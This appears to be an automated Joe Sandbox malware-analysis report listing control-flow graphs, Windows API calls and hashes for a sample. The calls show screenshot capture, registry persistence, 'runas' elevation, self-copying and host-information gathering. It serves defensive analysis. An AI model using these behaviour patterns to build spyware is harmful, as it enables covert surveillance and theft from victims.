dd38dd-dd38f6 call ded41c 118->122 119->117 124 dd3459-dd3460 call de8dbf 120->124 125 dd3445-dd3453 120->125 126 dd348d-dd349c 121->126 127 dd34bc-dd34e4 121->127 124->121 125->122 125->124 133 dd349e-dd34ac 126->133 134 dd34b2-dd34b9 call de8dbf 126->134 128 dd3515-dd355d call de7200 call dd2da0 127->128 129 dd34e6-dd34f5 127->129 147 dd355f 128->147 148 dd3561-dd358f RegGetValueA 128->148 135 dd350b-dd3512 call de8dbf 129->135 136 dd34f7-dd3505 129->136 133->122 133->134 134->127 135->128 136->122 136->135 147->148 149 dd35c6-dd35d0 148->149 150 dd3591-dd35a0 148->150 151 dd35db-dd35dd GetSystemMetrics 149->151 152 dd35d2-dd35d7 GetSystemMetrics 149->152 153 dd35b6-dd35c3 call de8dbf 150->153 154 dd35a2-dd35b0 150->154 157 dd35e0-dd360d call de7200 call dd2da0 151->157 156 dd35d9 152->156 152->157 153->149 154->153 156->151 163 dd360f 157->163 164 dd3611-dd3639 RegGetValueA 157->164 163->164 165 dd363b-dd364a 164->165 166 dd3670-dd3674 164->166 169 dd364c-dd365a 165->169 170 dd3660-dd366d call de8dbf 165->170 167 dd367f-dd3681 GetSystemMetrics 166->167 168 dd3676-dd367b GetSystemMetrics 166->168 173 dd3684-dd3711 CreateCompatibleDC CreateCompatibleBitmap SelectObject BitBlt GdipCreateBitmapFromHBITMAP GdipGetImageEncodersSize 167->173 172 dd367d 168->172 168->173 169->170 170->166 172->167 175 dd3717-dd372a call ded46d 173->175 176 dd37a1-dd37f6 GdipSaveImageToFile SelectObject DeleteObject * 2 ReleaseDC GdipDisposeImage 173->176 175->176 189 dd372c-dd373e GdipGetImageEncoders 175->189 178 dd37f8-dd3804 176->178 179 dd3824-dd383c 176->179 183 dd381a-dd3821 call de8dbf 178->183 184 dd3806-dd3814 178->184 180 dd383e-dd3850 179->180 181 dd3889-dd3898 GdiplusShutdown 179->181 185 dd387f-dd3886 call de8dbf 180->185 186 dd3852-dd3866 180->186 187 dd389a-dd38a6 181->187 188 dd38c2-dd38dc call de8932 181->188 183->179 184->183 185->181 186->185 193 dd38b8-dd38bf call de8dbf 187->193 194 dd38a8-dd38b6 187->194 195 dd3740 189->195 196 dd3792 189->196 193->188 194->193 203 dd3743-dd374a 195->203 201 dd3793-dd379e call ded222 196->201 201->176 206 dd3750-dd3756 203->206 208 dd3758-dd375b 206->208 209 dd3776-dd3778 206->209 211 dd375d-dd3765 208->211 212 dd3772-dd3774 208->212 210 dd377b-dd377d 209->210 214 dd3868-dd387a 210->214 215 dd3783-dd378a 210->215 211->209 213 dd3767-dd3770 211->213 212->210 213->206 213->212 214->201 215->203 216 dd378c 215->216 216->196
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,5CAF3EEB,5CAF3EEB), ref: 00DD2F4C
                                                • RegQueryValueExA.ADVAPI32(5CAF3EEB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,5CAF3EEB,5CAF3EEB), ref: 00DD2F7A
                                                • RegCloseKey.ADVAPI32(5CAF3EEB,?,?,00000000,00000001,5CAF3EEB,5CAF3EEB), ref: 00DD2F86
                                                • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00DD3093
                                                • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00DD30C1
                                                • RegCloseKey.ADVAPI32(80000001), ref: 00DD30CA
                                                • GdiplusStartup.GDIPLUS(?,?,00000000,5CAF3EEB), ref: 00DD31FA
                                                • GetDC.USER32(00000000), ref: 00DD32F2
                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00DD3579
                                                • GetSystemMetrics.USER32 ref: 00DD35D2
                                                • GetSystemMetrics.USER32 ref: 00DD35DB
                                                • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00DD3623
                                                • GetSystemMetrics.USER32 ref: 00DD3676
                                                • GetSystemMetrics.USER32 ref: 00DD367F
                                                • CreateCompatibleDC.GDI32(?), ref: 00DD368B
                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00DD36A0
                                                • SelectObject.GDI32(00000000,00000000), ref: 00DD36B0
                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00DD36D6
                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 00DD36EA
                                                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 00DD3706
                                                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00DD3733
                                                • GdipSaveImageToFile.GDIPLUS(00000000,?,?,00000000), ref: 00DD37B7
                                                • SelectObject.GDI32(00000000,?), ref: 00DD37C4
                                                • DeleteObject.GDI32(00000000), ref: 00DD37D1
                                                • DeleteObject.GDI32(?), ref: 00DD37D9
                                                • ReleaseDC.USER32 ref: 00DD37E3
                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00DD37EA
                                                • GdiplusShutdown.GDIPLUS(?), ref: 00DD388C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Gdip$ImageMetricsObjectSystemValue$Create$BitmapCloseCompatibleDeleteEncodersGdiplusOpenSelect$DisposeFileFromQueryReleaseSaveShutdownSizeStartup
                                                • String ID: image/jpeg
                                                • API String ID: 406439762-3785015651
                                                • Opcode ID: ed93fdf179ae2d24e5db4e30a89537cf36aaa3e85692cd1d50da40138d642635
                                                • Instruction ID: 038a3cd91059e3d3cccfb79bc44905560047a988e548ffc814faba169d0b4086
                                                • Opcode Fuzzy Hash: ed93fdf179ae2d24e5db4e30a89537cf36aaa3e85692cd1d50da40138d642635
                                                • Instruction Fuzzy Hash: A262E271A001489FEB18DF68CC85BEDBBB6EF45304F508259F409A7391EB759A84CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 345 dd4480-dd4533 call de76c0 ShellExecuteA 349 dd4561-dd45bb 345->349 351 dd45bd-dd45c9 349->351 352 dd45e5-dd45f6 349->352 353 dd45db-dd45e2 call de8dbf 351->353 354 dd45cb-dd45d9 351->354 353->352 354->353 355 dd45f7-dd466a call ded41c call de7200 * 3 call dd4480 354->355
                                                APIs
                                                • ShellExecuteA.SHELL32(00000000,00DFA038,?,?,00000000,00000000), ref: 00DD4522
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: +S$runas
                                                • API String ID: 587946157-2207193102
                                                • Opcode ID: 105d29fa505c0a07b20001486fc6fd1ab11ce312e856b885749d6de922550fa6
                                                • Instruction ID: 3df884a8c429144eff9a63e28dd4d6d7094a53bcb9c01216959d62c04c8daa32
                                                • Opcode Fuzzy Hash: 105d29fa505c0a07b20001486fc6fd1ab11ce312e856b885749d6de922550fa6
                                                • Instruction Fuzzy Hash: 1341F37020024CEFDF04EF69C841B9E7BE5EB45350F908229F825976C1D775DA888BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 367 dec0e1-dec0ee call dee6f2 370 dec110-dec11c call dec123 ExitProcess 367->370 371 dec0f0-dec0fe GetPEB 367->371 371->370 372 dec100-dec10a GetCurrentProcess TerminateProcess 371->372 372->370
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00DEF73E,?,00DEC0E0,00DEC666,?,00DEF73E,00DEC666,00DEF73E), ref: 00DEC103
                                                • TerminateProcess.KERNEL32(00000000,?,00DEC0E0,00DEC666,?,00DEF73E,00DEC666,00DEF73E), ref: 00DEC10A
                                                • ExitProcess.KERNEL32 ref: 00DEC11C
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 64b71b077213871c4b288e99baff58a17f7d6576f965b5952579faaf1f767864
                                                • Instruction ID: 542da3c42c1a779d8c54c881625998f0fd53fd2ca2921728f22f4f4aba21b17b
                                                • Opcode Fuzzy Hash: 64b71b077213871c4b288e99baff58a17f7d6576f965b5952579faaf1f767864
                                                • Instruction Fuzzy Hash: 11E0EC31411288AFCF127F56DC09B593B69FB45391F445818F91596232CB3AED92DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 217 df3ded-df3e1d call df3b3b 220 df3e1f-df3e2a call decf1d 217->220 221 df3e38-df3e44 call df06ba 217->221 226 df3e2c-df3e33 call decf30 220->226 227 df3e5d-df3ea6 call df3aa6 221->227 228 df3e46-df3e5b call decf1d call decf30 221->228 238 df4112-df4116 226->238 236 df3ea8-df3eb1 227->236 237 df3f13-df3f1c GetFileType 227->237 228->226 240 df3ee8-df3f0e GetLastError call decefa 236->240 241 df3eb3-df3eb7 236->241 242 df3f1e-df3f4f GetLastError call decefa CloseHandle 237->242 243 df3f65-df3f68 237->243 240->226 241->240 246 df3eb9-df3ee6 call df3aa6 241->246 242->226 254 df3f55-df3f60 call decf30 242->254 244 df3f6a-df3f6f 243->244 245 df3f71-df3f77 243->245 250 df3f7b-df3fc9 call df0605 244->250 245->250 251 df3f79 245->251 246->237 246->240 260 df3fcb-df3fd7 call df3cb5 250->260 261 df3fe8-df4010 call df3853 250->261 251->250 254->226 260->261 268 df3fd9 260->268 266 df4015-df4056 261->266 267 df4012-df4013 261->267 270 df4058-df405c 266->270 271 df4077-df4085 266->271 269 df3fdb-df3fe3 call deeee4 267->269 268->269 269->238 270->271 273 df405e-df4072 270->273 274 df408b-df408f 271->274 275 df4110 271->275 273->271 274->275 277 df4091-df40c4 CloseHandle call df3aa6 274->277 275->238 280 df40f8-df410c 277->280 281 df40c6-df40f2 GetLastError call decefa call df07cd 277->281 280->275 281->280
                                                APIs
                                                  • Part of subcall function 00DF3AA6: CreateFileW.KERNELBASE(00000000,00000000,?,00DF3E96,?,?,00000000,?,00DF3E96,00000000,0000000C), ref: 00DF3AC3
                                                • GetLastError.KERNEL32 ref: 00DF3F01
                                                • __dosmaperr.LIBCMT ref: 00DF3F08
                                                • GetFileType.KERNELBASE(00000000), ref: 00DF3F14
                                                • GetLastError.KERNEL32 ref: 00DF3F1E
                                                • __dosmaperr.LIBCMT ref: 00DF3F27
                                                • CloseHandle.KERNEL32(00000000), ref: 00DF3F47
                                                • CloseHandle.KERNEL32(00DEEC2E), ref: 00DF4094
                                                • GetLastError.KERNEL32 ref: 00DF40C6
                                                • __dosmaperr.LIBCMT ref: 00DF40CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 8bb459cd20646036de0e2eabe1bc66487d73887d072e0dd3beabd8b3147be508
                                                • Instruction ID: d783abf296f815f739d5cb44fee33d1046fa138849a40015982a9fd3ef4daf02
                                                • Opcode Fuzzy Hash: 8bb459cd20646036de0e2eabe1bc66487d73887d072e0dd3beabd8b3147be508
                                                • Instruction Fuzzy Hash: 6AA11532A141489FCF19AF68DC517BE3BB1EF06320F1A4149F911AB2A1CB359956CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00DDB65D
                                                • GetFileAttributesA.KERNELBASE(?), ref: 00DDB75B
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00DDB77D
                                                • GetFileAttributesA.KERNELBASE(?), ref: 00DDB798
                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DDB8C9
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Attributes$CopyCreateDirectoryModuleName
                                                • String ID:
                                                • API String ID: 3597215635-0
                                                • Opcode ID: 4d29b05f94959fc50c246c3cba8717b043b1d8e6fedc9abd63ffec03e6f6e997
                                                • Instruction ID: b01f143a5899b948d5283e3e0e92b6fc277d4da8be4f7b1b85aaaae41eb0394e
                                                • Opcode Fuzzy Hash: 4d29b05f94959fc50c246c3cba8717b043b1d8e6fedc9abd63ffec03e6f6e997
                                                • Instruction Fuzzy Hash: B9B1F3B1A002589BEF28EB28CC8579DB775EF45328F5041D9E209A72C2DB359EC48F75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00DDB43E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PathTemp
                                                • String ID:
                                                • API String ID: 2920410445-0
                                                • Opcode ID: 41d43cca9d28f121bee91f5c2351fa5e9e46a9b199b7581ce57e1794c20508e3
                                                • Instruction ID: 82ce5e5283c925f8b532110ac6a484c3f04e01faccb0b5f9c03c10dcf91375de
                                                • Opcode Fuzzy Hash: 41d43cca9d28f121bee91f5c2351fa5e9e46a9b199b7581ce57e1794c20508e3
                                                • Instruction Fuzzy Hash: 7D71AFB09042988BEB24DB28CD45BEDBBB5EB51308F5041D9D20967382DB751AC8CFB9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 418 de8b3e-de8b41 419 de8b50-de8b53 call ded46d 418->419 421 de8b58-de8b5b 419->421 422 de8b5d-de8b5e 421->422 423 de8b43-de8b4e call ded487 421->423 423->419 426 de8b5f-de8b63 423->426 427 de8b69-de9066 call de878f call de9bc4 426->427 428 dd2180-dd21d0 call dd2160 call de9bc4 call de9989 426->428
                                                APIs
                                                • ___std_exception_copy.LIBVCRUNTIME ref: 00DD21BE
                                                  • Part of subcall function 00DE9BC4: RaiseException.KERNEL32(E06D7363,00000001,00000003,00DD219C,?,?,?,00DD219C,?,00E08F54), ref: 00DE9C24
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise___std_exception_copy
                                                • String ID:
                                                • API String ID: 3109751735-0
                                                • Opcode ID: 3965e3717186403f6fb12f6d56ac5447a535afb538f152969839c3c06f27f727
                                                • Instruction ID: aaf4d1a42a4a9433f89882772f220572145fe67516e6e5de339ce726f7595ec3
                                                • Opcode Fuzzy Hash: 3965e3717186403f6fb12f6d56ac5447a535afb538f152969839c3c06f27f727
                                                • Instruction Fuzzy Hash: 2601047580034D77CB14BBA6EC42899B76CDE10310B508526F668A7181FF70E68487B4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 deebef-deec15 call dee9c5 443 deec6e-deec71 440->443 444 deec17-deec29 call df3dcd 440->444 446 deec2e-deec33 444->446 446->443 447 deec35-deec6d 446->447
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __wsopen_s
                                                • String ID:
                                                • API String ID: 3347428461-0
                                                • Opcode ID: e9150aa59584792e9dc4e7ff8a8005b1efdc7b482454b1499c8f3eb41e495a67
                                                • Instruction ID: 039f592b1f4a352282b859d0cdc2d060cd38f43c7a1d8dc886e9538b0091375d
                                                • Opcode Fuzzy Hash: e9150aa59584792e9dc4e7ff8a8005b1efdc7b482454b1499c8f3eb41e495a67
                                                • Instruction Fuzzy Hash: 75114571A0020AAFCF05DF59E94199F7BF4EF48304F1540A9F808EB211D630EA11CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 448 df0494-df04a1 call df1063 450 df04a6-df04b1 448->450 451 df04b7-df04bf 450->451 452 df04b3-df04b5 450->452 453 df0502-df050e call deed91 451->453 454 df04c1-df04c5 451->454 452->453 455 df04c7-df04fc call defc41 454->455 460 df04fe-df0501 455->460 460->453
                                                APIs
                                                  • Part of subcall function 00DF1063: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DEF824,00000001,00000364,00000006,000000FF,?,?,00DE99B3,?), ref: 00DF10A4
                                                • _free.LIBCMT ref: 00DF0503
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                • Instruction ID: c416412e7bc61cdb7658e695aa08c32135a4c2712234258286656b2f35111adb
                                                • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                • Instruction Fuzzy Hash: 5B014E7260435A9BC3319F98C8819ADFF98EB04370F154629E645A76C1D7705C10CBF4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 461 df3d5f-df3d93 call dec510 call dec470 466 df3d9a-df3daf call df3ded 461->466 467 df3d95-df3d98 461->467 470 df3db4-df3db7 466->470 468 df3db9-df3dbd 467->468 471 df3dbf-df3dc7 call deed91 468->471 472 df3dc8-df3dcc 468->472 470->468 471->472
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                • Instruction ID: a1b8966a1df7643f52f056075736dd48b6e3cc11e6961fe7cb1d3a7d4c1e5f36
                                                • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                • Instruction Fuzzy Hash: 2801FF72D0115DBFCF02AFA88C01AEE7FB5EF08354F154165FA64E2191E6318A61DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 475 df1063-df106e 476 df107c-df1082 475->476 477 df1070-df107a 475->477 479 df109b-df10ac RtlAllocateHeap 476->479 480 df1084-df1085 476->480 477->476 478 df10b0-df10bb call decf30 477->478 485 df10bd-df10bf 478->485 481 df10ae 479->481 482 df1087-df108e call dee411 479->482 480->479 481->485 482->478 488 df1090-df1099 call ded487 482->488 488->478 488->479
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DEF824,00000001,00000364,00000006,000000FF,?,?,00DE99B3,?), ref: 00DF10A4
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c013cf509b3449ffa2b7c7cfa5eb7b41594556c15f878147ea186da37cfb3d06
                                                • Instruction ID: 47de2437dde6b283e545600c854cc88a353cdf3be9afeefeb39b37fe2c66b88d
                                                • Opcode Fuzzy Hash: c013cf509b3449ffa2b7c7cfa5eb7b41594556c15f878147ea186da37cfb3d06
                                                • Instruction Fuzzy Hash: AEF0903A1011A8EA9B21AB279C01B7B77689B417B0B1AC211BA08E6284CE21E88142B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00DDB3E0: GetTempPathA.KERNEL32(00000104,?), ref: 00DDB43E
                                                  • Part of subcall function 00DDA8B0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,5CAF3EEB), ref: 00DDA8EC
                                                  • Part of subcall function 00DD6640: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00DD6670
                                                  • Part of subcall function 00DE4010: IsUserAnAdmin.SHELL32 ref: 00DE406D
                                                  • Part of subcall function 00DE4010: GetUserNameA.ADVAPI32(?,?), ref: 00DE4117
                                                  • Part of subcall function 00DE4010: GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 00DE4180
                                                  • Part of subcall function 00DE6F40: CreateThread.KERNEL32 ref: 00DE6F56
                                                  • Part of subcall function 00DE6F40: CreateThread.KERNEL32 ref: 00DE6F67
                                                  • Part of subcall function 00DE6F40: CreateThread.KERNEL32 ref: 00DE6F78
                                                  • Part of subcall function 00DE6F40: Sleep.KERNEL32(00007530,?,00DE6FD3), ref: 00DE6F85
                                                • InternetCloseHandle.WININET(00000000), ref: 00DE6FE7
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Name$CreateThread$FileModuleUser$AdminCloseComputerHandleInternetPathSleepTemp
                                                • String ID:
                                                • API String ID: 1327835013-0
                                                • Opcode ID: 4236093862a91cf81d20856da943f9c78d39df6caeeec775e3859d4775b06fb4
                                                • Instruction ID: 5156bcd1af4867aa54e50ad4daa6e63997bda3c5399c0f3e593c836438b88ec1
                                                • Opcode Fuzzy Hash: 4236093862a91cf81d20856da943f9c78d39df6caeeec775e3859d4775b06fb4
                                                • Instruction Fuzzy Hash: C8E0C2619000444BDE4437FEAC1BB0D3118CF50364F5402ABB91082BD7ED01D91051F3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
